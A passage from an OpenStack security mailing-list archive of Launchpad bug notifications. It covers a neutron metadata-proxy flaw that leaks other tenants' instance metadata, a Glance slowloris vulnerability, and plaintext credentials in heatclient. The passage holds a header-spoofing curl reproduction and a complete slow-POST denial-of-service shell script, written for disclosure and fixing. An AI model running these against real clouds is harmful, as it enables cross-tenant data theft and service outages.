with that network (other connections irrelevant) 4) boot up the instance (make sure to drop the potential route to dhcp agent metadata proxy if used) 5) run e.g.: curl -H "X-Neutron-Network-ID: $VICTIM_NET_ID" 169.254.169.254/openstack/latest/meta_data.json Observed behaviour: Normally-secret information disclosure. Expected behaviour: Proxy ignores (removes) that extra header and proceeds as if nothing happened (most expected) OR proxy returns an error (and logs it / sends a notification about it) OR proxy blocks the request and calls the police as you are a bad boy :-) (least expected... but nice) Initial code analysis: 1) the haproxy config is inadequate: https://opendev.org/openstack/neutron/src/commit/6b9765c991da8731fe39f7e7eed1ed6e2bca231a/neutron/agent/metadata/driver.py#L68 ^ this should replace all current headers in the current trust model 2) the reason this works with l3 agent (and so far not with dhcp agent unless there is some other general header exploit in the stack) are the following lines: https://opendev.org/openstack/neutron/src/commit/6b9765c991da8731fe39f7e7eed1ed6e2bca231a/neutron/agent/metadata/agent.py#L146-L152 To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1865036/+subscriptions From 1865036 at bugs.launchpad.net Fri Feb 28 14:48:35 2020 From: 1865036 at bugs.launchpad.net (Brian Haley) Date: Fri, 28 Feb 2020 14:48:35 -0000 Subject: [Openstack-security] [Bug 1865036] Re: l3 agent metadata proxy allows access to metadata from any available network References: <158281263855.14801.16461719155643273924.malonedeb@soybean.canonical.com> Message-ID: <158290131679.26618.6611331014098608872.launchpad@gac.canonical.com> ** Changed in: neutron Importance: Undecided => High -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1865036 Title: l3 agent metadata proxy allows access to metadata from any available network Status in neutron: In Progress Status in OpenStack Security Advisory: Won't Fix Bug description: Tested with Train release, by quick code check it affects also at least Rocky, Stein and Ussuri (current master). The security issue is than one can access metadata of an arbitrary other instance if the following conditions are met (let's call the "other instance" a "victim", it can be in any other project not normally available to the attacker): 1) Victim's port fixed IP address is known. 2) Victim's port network ID is known. 3) Attacker can use a network with access to l3 agent metadata proxy (i.e. can use routers) and deploy instances. The scenario is as follows: 1) create a self-service network including the targeted address 2) create an instance with the same fixed IP address 3) create a router and wire it up with that network (other connections irrelevant) 4) boot up the instance (make sure to drop the potential route to dhcp agent metadata proxy if used) 5) run e.g.: curl -H "X-Neutron-Network-ID: $VICTIM_NET_ID" 169.254.169.254/openstack/latest/meta_data.json Observed behaviour: Normally-secret information disclosure. Expected behaviour: Proxy ignores (removes) that extra header and proceeds as if nothing happened (most expected) OR proxy returns an error (and logs it / sends a notification about it) OR proxy blocks the request and calls the police as you are a bad boy :-) (least expected... but nice) Initial code analysis: 1) the haproxy config is inadequate: https://opendev.org/openstack/neutron/src/commit/6b9765c991da8731fe39f7e7eed1ed6e2bca231a/neutron/agent/metadata/driver.py#L68 ^ this should replace all current headers in the current trust model 2) the reason this works with l3 agent (and so far not with dhcp agent unless there is some other general header exploit in the stack) are the following lines: https://opendev.org/openstack/neutron/src/commit/6b9765c991da8731fe39f7e7eed1ed6e2bca231a/neutron/agent/metadata/agent.py#L146-L152 To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1865036/+subscriptions From 1865036 at bugs.launchpad.net Fri Feb 28 14:48:49 2020 From: 1865036 at bugs.launchpad.net (OpenStack Infra) Date: Fri, 28 Feb 2020 14:48:49 -0000 Subject: [Openstack-security] [Bug 1865036] Re: l3 agent metadata proxy allows access to metadata from any available network References: <158281263855.14801.16461719155643273924.malonedeb@soybean.canonical.com> Message-ID: <158290132962.11976.16542312497502745151.malone@soybean.canonical.com> Fix proposed to branch: master Review: https://review.opendev.org/710458 ** Changed in: neutron Status: Confirmed => In Progress -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1865036 Title: l3 agent metadata proxy allows access to metadata from any available network Status in neutron: In Progress Status in OpenStack Security Advisory: Won't Fix Bug description: Tested with Train release, by quick code check it affects also at least Rocky, Stein and Ussuri (current master). The security issue is than one can access metadata of an arbitrary other instance if the following conditions are met (let's call the "other instance" a "victim", it can be in any other project not normally available to the attacker): 1) Victim's port fixed IP address is known. 2) Victim's port network ID is known. 3) Attacker can use a network with access to l3 agent metadata proxy (i.e. can use routers) and deploy instances. The scenario is as follows: 1) create a self-service network including the targeted address 2) create an instance with the same fixed IP address 3) create a router and wire it up with that network (other connections irrelevant) 4) boot up the instance (make sure to drop the potential route to dhcp agent metadata proxy if used) 5) run e.g.: curl -H "X-Neutron-Network-ID: $VICTIM_NET_ID" 169.254.169.254/openstack/latest/meta_data.json Observed behaviour: Normally-secret information disclosure. Expected behaviour: Proxy ignores (removes) that extra header and proceeds as if nothing happened (most expected) OR proxy returns an error (and logs it / sends a notification about it) OR proxy blocks the request and calls the police as you are a bad boy :-) (least expected... but nice) Initial code analysis: 1) the haproxy config is inadequate: https://opendev.org/openstack/neutron/src/commit/6b9765c991da8731fe39f7e7eed1ed6e2bca231a/neutron/agent/metadata/driver.py#L68 ^ this should replace all current headers in the current trust model 2) the reason this works with l3 agent (and so far not with dhcp agent unless there is some other general header exploit in the stack) are the following lines: https://opendev.org/openstack/neutron/src/commit/6b9765c991da8731fe39f7e7eed1ed6e2bca231a/neutron/agent/metadata/agent.py#L146-L152 To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1865036/+subscriptions From fungi at yuggoth.org Fri Feb 28 14:46:53 2020 From: fungi at yuggoth.org (Jeremy Stanley) Date: Fri, 28 Feb 2020 14:46:53 -0000 Subject: [Openstack-security] [Bug 1408530] Re: heat CLI is passing raw username and password for stack-create stack-update and stack-preview References: <20150108024125.4891.64572.malonedeb@chaenomeles.canonical.com> Message-ID: <158290121439.26961.6628657192867153538.launchpad@gac.canonical.com> ** Information type changed from Private Security to Public ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1408530 Title: heat CLI is passing raw username and password for stack-create stack- update and stack-preview Status in python-heatclient: Triaged Bug description: When using the CLI or the heatclient directly for every call to stack.create, stack.preview or stack.update the username and password are being transmitted in plaintext to heat as the X-Auth-User and X -Auth-Key headers. This would seem like a hangover from before trusts being available and heat wanting to authenticate as the current user. This behaviour ignores the --include-password cli flag. To manage notifications about this bug go to: https://bugs.launchpad.net/python-heatclient/+bug/1408530/+subscriptions From fungi at yuggoth.org Fri Feb 28 15:32:17 2020 From: fungi at yuggoth.org (Jeremy Stanley) Date: Fri, 28 Feb 2020 15:32:17 -0000 Subject: [Openstack-security] [Bug 1572966] Re: Glance is vulnerable to 'slow DOS' attacks References: <20160421110623.5722.62560.malonedeb@chaenomeles.canonical.com> Message-ID: <158290393846.11731.6868849886277313339.launchpad@wampee.canonical.com> ** Description changed: - This issue is being treated as a potential security risk under embargo. - Please do not make any public mention of embargoed (private) security - vulnerabilities before their coordinated publication by the OpenStack - Vulnerability Management Team in the form of an official OpenStack - Security Advisory. This includes discussion of the bug or associated - fixes in public forums such as mailing lists, code review systems and - bug trackers. Please also avoid private disclosure to other individuals - not already approved for access to this information, and provide this - same reminder to those who are made aware of the issue prior to - publication. All discussion should remain confined to this private bug - report, and any proposed fixes should be added to the bug as - attachments. - Glance is vulnerable to 'slow POST'/ 'slowloris'/slow read style attacks. You can use a script such as this:  #!/bin/sh  echo "POST /v2/images HTTP/1.1"  echo "Host: 192.168.1.101:9292"  echo "Accept-Encoding: gzip, deflate"  echo "X-Auth-Token: 4c70f52ea77b40e2ae42ccd0ac868e1d"  echo "Content-Type: application/json"  echo "Content-Length: 1000000000000000"  echo  while true  do    sleep 1    echo -n "X"  done to hold a connection open to Glance indefinitely ($ bash script.sh | telnet localhost 9292). You can also do similar things sending bogus headers indefinitely/doing slow reads etc. (There's a good blog post here https://blogs.akamai.com/2013/09/slow- dos-on-the-rise.html) A couple of points: 1. This isn't specific to Glance 2. I'm not convinced that Glance code is the place to address this 3. I'm motivated to log this in part due to the proposed new 'max_upload_time' parameter: https://review.openstack.org/#/c/270980/9/glance/api/v2/info.py I'd like to discuss the the max_upload_time parameter without being accused of openly discussing DOS opportunities (even if they are fairly obvious ones) ** Information type changed from Private Security to Public ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1572966 Title: Glance is vulnerable to 'slow DOS' attacks Status in Glance: Opinion Status in OpenStack Compute (nova): Opinion Status in OpenStack Security Advisory: Opinion Bug description: Glance is vulnerable to 'slow POST'/ 'slowloris'/slow read style attacks. You can use a script such as this:  #!/bin/sh  echo "POST /v2/images HTTP/1.1"  echo "Host: 192.168.1.101:9292"  echo "Accept-Encoding: gzip, deflate"  echo "X-Auth-Token: 4c70f52ea77b40e2ae42ccd0ac868e1d"  echo "Content-Type: application/json"  echo "Content-Length: 1000000000000000"  echo  while true  do    sleep 1    echo -n "X"  done to hold a connection open to Glance indefinitely ($ bash script.sh | telnet localhost 9292). You can also do similar things sending bogus headers indefinitely/doing slow reads etc. (There's a good blog post here https://blogs.akamai.com/2013/09/slow- dos-on-the-rise.html) A couple of points: 1. This isn't specific to Glance 2. I'm not convinced that Glance code is the place to address this 3. I'm motivated to log this in part due to the proposed new 'max_upload_time' parameter: https://review.openstack.org/#/c/270980/9/glance/api/v2/info.py I'd like to discuss the the max_upload_time parameter without being accused of openly discussing DOS opportunities (even if they are fairly obvious ones) To manage notifications about this bug go to: https://bugs.launchpad.net/glance/+bug/1572966/+subscriptions From 1865036 at bugs.launchpad.net Fri Feb 28 16:41:59 2020 From: 1865036 at bugs.launchpad.net (=?utf-8?q?Rados=C5=82aw_Piliszek?=) Date: Fri, 28 Feb 2020 16:41:59 -0000 Subject: [Openstack-security] [Bug 1865036] Re: l3 agent metadata proxy allows access to metadata from any available network References: <158281263855.14801.16461719155643273924.malonedeb@soybean.canonical.com> Message-ID: <158290811976.26040.12751434921951425692.malone@gac.canonical.com> @Daniel - yeah, I confirmed that in comment #7. @Brian - ack, agreed. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1865036 Title: l3 agent metadata proxy allows access to metadata from any available network Status in neutron: In Progress Status in OpenStack Security Advisory: Won't Fix Bug description: Tested with Train release, by quick code check it affects also at least Rocky, Stein and Ussuri (current master). The security issue is than one can access metadata of an arbitrary other instance if the following conditions are met (let's call the "other instance" a "victim", it can be in any other project not normally available to the attacker): 1) Victim's port fixed IP address is known. 2) Victim's port network ID is known. 3) Attacker can use a network with access to l3 agent metadata proxy (i.e. can use routers) and deploy instances. The scenario is as follows: 1) create a self-service network including the targeted address 2) create an instance with the same fixed IP address 3) create a router and wire it up with that network (other connections irrelevant) 4) boot up the instance (make sure to drop the potential route to dhcp agent metadata proxy if used) 5) run e.g.: curl -H "X-Neutron-Network-ID: $VICTIM_NET_ID" 169.254.169.254/openstack/latest/meta_data.json Observed behaviour: Normally-secret information disclosure. Expected behaviour: Proxy ignores (removes) that extra header and proceeds as if nothing happened (most expected) OR proxy returns an error (and logs it / sends a notification about it) OR proxy blocks the request and calls the police as you are a bad boy :-) (least expected... but nice) Initial code analysis: 1) the haproxy config is inadequate: https://opendev.org/openstack/neutron/src/commit/6b9765c991da8731fe39f7e7eed1ed6e2bca231a/neutron/agent/metadata/driver.py#L68 ^ this should replace all current headers in the current trust model 2) the reason this works with l3 agent (and so far not with dhcp agent unless there is some other general header exploit in the stack) are the following lines: https://opendev.org/openstack/neutron/src/commit/6b9765c991da8731fe39f7e7eed1ed6e2bca231a/neutron/agent/metadata/agent.py#L146-L152 To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1865036/+subscriptions